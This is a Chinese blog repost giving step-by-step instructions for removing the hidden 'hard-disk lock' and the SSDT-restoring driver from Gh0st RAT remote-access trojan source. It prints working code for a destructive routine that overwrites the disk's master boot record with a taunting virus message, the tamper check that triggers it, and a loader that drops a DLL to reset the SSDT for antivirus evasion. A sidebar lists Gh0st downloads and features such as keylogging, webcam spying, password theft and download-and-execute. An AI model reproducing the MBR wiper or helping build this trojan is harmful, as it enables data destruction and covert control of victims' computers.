gh0st源码去硬盘锁与驱动

最新推荐文章于 2021-05-12 08:39:53 发布
转载 最新推荐文章于 2021-05-12 08:39:53 发布 · 970 阅读 · 3
文章标签:

#gh0st

去硬盘锁:

1.打开源文件gh0st.cpp(搜索unsigned char scode[] =)

注释以下部分:

/*   
unsigned char scode[] =   
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"   
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"   
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";   
                                                 
int CGh0stApp::KillMBR()   
{   
    HANDLE hDevice;   
    DWORD dwBytesWritten, dwBytesReturned;   
    BYTE pMBR[512] = {0};   
                                                     
    // 重新构造MBR   
    memcpy(pMBR, scode, sizeof(scode) - 1);   
    pMBR[510] = 0x55;   
    pMBR[511] = 0xAA;   
                                                     
    hDevice = CreateFile   
        (   
        "\\\\.\\PHYSICALDRIVE0",   
        GENERIC_READ | GENERIC_WRITE,   
        FILE_SHARE_READ | FILE_SHARE_WRITE,   
        NULL,   
        OPEN_EXISTING,   
        0,   
        NULL   
        );   
    if (hDevice == INVALID_HANDLE_VALUE)   
        return -1;   
    DeviceIoControl   
        (   
        hDevice,    
        FSCTL_LOCK_VOLUME,    
        NULL,    
        0,    
        NULL,    
        0,    
        &dwBytesReturned,    
        NULL   
        );   
    // 写入病毒内容   
    WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);   
    DeviceIoControl   
        (   
        hDevice,    
        FSCTL_UNLOCK_VOLUME,    
        NULL,    
        0,    
        NULL,    
        0,    
        &dwBytesReturned,    
        NULL   
        );   
    CloseHandle(hDevice);   
                                                 
    ExitProcess(-1);   
    return 0;   
}   
*/2.打开BuildView.cpp,找到以下代码注释

/*   
    char    strVer[10];   
    char    strTitle[10];   
                                             
    strVer[0] = 'C';   
    strVer[1] = '.';   
    strVer[2] = 'R';   
    strVer[3] = 'u';   
    strVer[4] = 'f';   
    strVer[5] = 'u';   
    strVer[6] = 's';   
    strVer[7] = ' ';   
    strVer[8] = 'S';   
    strVer[9] = '\0';   
                                             
    strTitle[0] = 'G';   
    strTitle[1] = 'h';   
    strTitle[2] = '0';   
    strTitle[3] = 's';   
    strTitle[4] = 't';   
    strTitle[5] = ' ';   
    strTitle[6] = 'R';   
    strTitle[7] = 'A';   
    strTitle[8] = 'T';   
    strTitle[9] = '\0';   
                                             
    CString str;   
    GetDlgItemText(IDC_STATIC_VER, str);   
    if (str.Find(strVer) == -1)   
        ((CGh0stApp *)AfxGetApp())->KillMBR();   
                                             
    GetParent()->GetWindowText(str);   
    if (str.Find(strTitle) == -1)   
        ((CGh0stApp *)AfxGetApp())->KillMBR();   
*/3.打开头文件的gh0st.h,注释掉

//int KillMBR();完成。

去除驱动文件:

1.搜索ResetSSDT,要从根文件夹搜索.

第一处

/*bool ResetSSDT(HMODULE    hModule)  
{  
    typedef bool (__stdcall * LPResetSSDT)();  
    bool    bRet = true;  
    char    strTmpPath[MAX_PATH];  
    char    strDllPath[MAX_PATH];  
                               
    GetTempPath(sizeof(strTmpPath), strTmpPath);  
    GetTempPath(sizeof(strDllPath), strDllPath);  
    wsprintf(strDllPath, "%s\\%d_ex.tmp", strTmpPath, GetTickCount());  
                               
    try  
    {  
        ReleaseResource(hModule, IDR_DLL, "BIN", strDllPath, NULL);  
                               
        HMODULE hDll = LoadLibrary(strDllPath);  
        if (hDll == NULL)  
        {  
            throw "";  
        }  
                               
        LPResetSSDT ResetSSDT = (LPResetSSDT)GetProcAddress(hDll, "ResetSSDT");  
        if (ResetSSDT == NULL)  
            throw "";  
        ResetSSDT();  
        FreeLibrary(hDll);  
                                           
    }catch(...)  
    {  
        bRet = false;  
        DeleteFile(strDllPath);  
    }  
                                   
    return bRet;  
}  
*/第二处

//ResetSSDT(hInstance);第三处

//#include "common/resetssdt.h"第四处

//extern "C" __declspec(dllexport) bool ResetSSDT();第五处

//      ResetSSDT();第六处

/*extern "C" __declspec(dllexport) bool ResetSSDT() 

    return RestoreSSDT(CKeyboardManager::g_hInstance); 

*/第七处

//IDR_SYS                 BIN     DISCARDABLE     "..\\sys\\RESSDT.sys"最后在svchost files工程中删除RESSDT.sys,再删除External Dependencies中的resetssdt.h

ok!

gh0st 远程桌面控制源码分析
02-18 3062
远程主机流程图:客户机流程图:CGh0stApp theApp; 唯一的实例在初始化中调用了主框架的 Activate 函数:BOOL CGh0stApp::InitInstance(){  ((CMainFrame*) m_pMainWnd)->Activate(nPort, nMaxConnection);}Activate 函数构造了一个  CIOCPServer 对象,然后调用 Initialize 函数初始化:void CMainFrame::Activate(UINT nPort, UINT n
gh0st源码/硬盘锁驱动/未做其它修改
06-19
已经除了硬盘锁驱动gh0st远控, 没有对代码进行其它的任何修改, 保持原汁原味
gh0st3.6_已硬盘锁_20210202_VS2017编译通过_注意杀毒软件.rar
03-03
Gh0st3.6版本,已屏蔽硬盘锁,WIN10+VS2017 Console版本编译通过
Gh0st3.6原版(未经修改,记得硬盘锁哦).rar
12-13
Gh0st3.6原版(未经修改,记得硬盘锁哦).rar
gh0st硬盘锁
系统运维
03-03 214
这几天闲来无事,下载了个gh0st源码,由于刚开始没有仔细看是否硬盘锁,差点整个硬盘都费了。 gh0st硬盘锁源码的作者为了保护版权而设置的,如果我们直接更改版权会造成硬盘被锁,中了硬盘锁的后果是非常严重的,特别是你电脑里有重要数据的时候,这样会导致你电脑里的数据全部丢失! 如果你没硬盘锁,又改了版权,那么打开gh0st控制端后会一闪就关闭了,这样就是中硬盘锁了,中了硬盘锁之后将不能重...
Gh0st3.6+已硬盘锁+win7.zip
08-13
Gh0st3.6+已硬盘锁+win7
精选资源
Gh0st Rat BetaV3.6源码+程序(硬盘锁).7z
06-21
其它细节方面的功能大家自己发现吧 功能: 文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名 屏幕监视 扫描算法速度最快可达到120帧/秒,差异算法适合网络极差的情况下传输,传输速度快...
Gh0st3.6_硬盘锁源码
03-17
Gh0st3.6_硬盘锁源码】是一个关于远程控制软件Gh0st的特定版本,其中“硬盘锁”意味着这个源码已经移除了对硬盘的加密限制,使得用户能够更自由地使用和研究。Gh0st是一款著名的远程控制工具,它允许操作者...
精选资源
gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_
10-02
"gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_"这个标题表明我们正在处理的是Gh0st远程控制软件的3.6版本的源代码。Gh0st是一款知名的远程控制工具,通常用于系统管理和维护,但也可能被滥用进行非法活动。"src...
Gh0st源码+硬盘锁
12-12
注: 软件不断更新中,有什么意见大家多多提,偶看可以的就采纳.....gh0st的成长,离不开大家的帮助. 2008/1/27 11:16 : 优化了屏幕传输算法,CPU利用率更低 2008/1/27 16:06 : 驱动以资源方式写入安装文件跟DLL文件中,...
Gh0st源码整理
07-07
控制端服务端都采用IOCP模型,数据传输采用zlib压缩方式 稳定快速,上线数量无上限,可同时控制上万台主机 控制端自动检测CPU使用率调整自己的工作线程, 稳定高效 宿主为svchost以系统服务启动,上线间隔为两分钟 心跳包机制防止意外掉线.. 支持HTTP和DNS上线两种方式 自动恢复SSDT(这功能干什么,大家都知道,免杀自己做吧) 控制端224K,返朴归真的界面,生成的服务端无壳,156K,可多次重复安装,重复安装要等2秒,要退出守护线程 其它细节方面的功能大家自己发现吧 功能: 文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名.. 屏幕监视 此模块全用汇编编写,传速速度快,控制屏幕,发送Ctrl+Alt+Del,7种色彩显示方式 键盘记录 可记录中英文信息,离线记录(记录上限50M)功能 远程终端 一个简单shell 系统管理 进程管理,窗口管理,拨号上网密码获取 视频监控 监控远程摄像头 会话管理 注销,重启,关机,卸载服务端 其它功能 下载执行指定URL中的程序,隐藏或者显示访问指定网址,清除系统日志 地址位置 将IP数据库文件QQWry.Dat放置程序同目录下即可显示地理位置 集群控制 可同时控制多台主机,同时打开视频监控等管理功能 演示地址 http://www.wolfexp.net/other/Gh0st_RAT/index.html http://www.wolfexp.net/other/Gh0st_RAT/demo.rar 更多请关注红狼安全小组官方网站 http://www.wolfexp.net/
Gh0st全套源码
02-15
Gh0st是一款优秀的远程控制软件,其可以实现对被控制端诸如文件管理、远程桌面、进程管理、视频监控等操作。
gh0st源码-(ddos和cpu核数开机时间)
03-21
服务器偷来的源码。。加了ddos+cpu核数+开机时间..
完整的gh0st源码,不错的参考源码
06-01
gh0st 远控源码,是vc6.0 编译的。虽然老套,但是经典,参考价值不小。
GH0ST3.79源码.rar
03-30
GH0ST3.79源码 很好用的版本,为了达到20个字,我不想说了
gh0st源码 linux,Gh0st3.78源码
weixin_42400669的博客
05-12 550
文件名大小更新时间Gh0st3.78\Bin\Client.exe45916162018-03-17Gh0st3.78\Bin\Client.ini732018-03-19Gh0st3.78\Bin\Plugins\Func.dll1433602018-03-17Gh0st3.78\Bin\Plugins\MSTSCAX.DLL6553602004-08-17Gh0st3.78\Bin\Plugi...
Gh0st 源码分析(一)
weixin_33690963的博客
12-29 4801
Gh0st 的编译使用方法 相信很多人应该或多或少地听说过 gh0st 的大名,正如上面所说,它是一款远程控制软件,其原始版本的代码和作者已经无从考证,笔者手里这一份也来源于网络,我修正一些 bug 并作了一些优化,仅供个人学习研究,不可用于商业用途和任何非法用途,否则后果自负。 代码下载方式,微信扫描以下二维码关注【高性能服务器开发】公众号,关注后回复【gh0st】即可得到下载链接: 编译方...
gh0st1.0完整源码.rar
12-13
gh0st1.0完整源码。网络上很多1.0的源码都不能编译,现在发个完整版的上来,只要你的SDK和TX库都打上补丁了,编译不通过,生成不了,资源分就原数返还给你!
关于一款开源远程控制软件(gh0st)的源码分析(一)
边城梦溪
02-04 5752
2020年注定是不平凡的一年,前有冠状病毒的肆虐,全国上下都笼罩在一种紧张而又不安的氛围中,后有20200202这个千年难得一遇的对称时刻,朋友圈便充斥着各种祝福童年回忆。正是因为这百年难得一遇的超长假期,才能让我有精力和时间分析那些静静地躺在我电脑磁盘里的开源软件的源码gh0st这款开源软件,主要的用途是用于远程操作另一台计算机(包括远程文件的拷贝、远程视频连接),功能有点类似于QQ中的...
gh0st源代码深度分析硬盘锁技术研究
从压缩包中的子文件名称“Gh0st3.6_硬盘锁”来看,该文件很可能是某个特定版本(3.6版)的gh0st源代码或编译后的程序,并且已经除了“硬盘锁”机制。硬盘锁是一种常见的软件保护机制,用于绑定程序特定硬盘的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值